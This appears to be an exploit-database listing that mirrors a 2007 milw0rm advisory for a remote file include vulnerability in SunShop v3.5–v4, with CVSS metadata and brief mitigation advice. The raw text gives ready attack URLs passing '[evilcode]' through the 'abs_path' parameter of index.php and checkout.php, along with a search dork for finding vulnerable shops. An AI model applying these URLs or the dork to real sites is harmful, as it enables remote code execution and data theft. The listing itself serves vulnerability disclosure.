header-logo
Suggest Exploit
vendor:
SunShop
by:
irvian
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: SunShop
Affected Version From: SunShop v3.5
Affected Version To: SunShop v4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

sunshop 4 (index.php) Remote File Include Vulnerability

The vulnerability allows remote attackers to include arbitrary files via the 'abs_path' parameter in the 'index.php' and 'checkout.php' scripts. This can lead to remote code execution and unauthorized access to sensitive information.

Mitigation:

Apply the latest security patches provided by the vendor. Restrict access to the affected scripts from untrusted sources. Regularly monitor and review server logs for any suspicious activity.
Source

Exploit-DB raw data:

sunshop 4 (index.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts       : SunShop v3.5
# Discovered By : irvian
# scripts site  : http://www.turnkeywebtools.com/sunshop/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork          : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:

Exploit: www.target.com/index.php?abs_path=[evilcode]
         www.target.com/checkout.php?abs_path=[evilcode]

# milw0rm.com [2007-04-16]

Navigation

Suggest Exploit

Services By CQR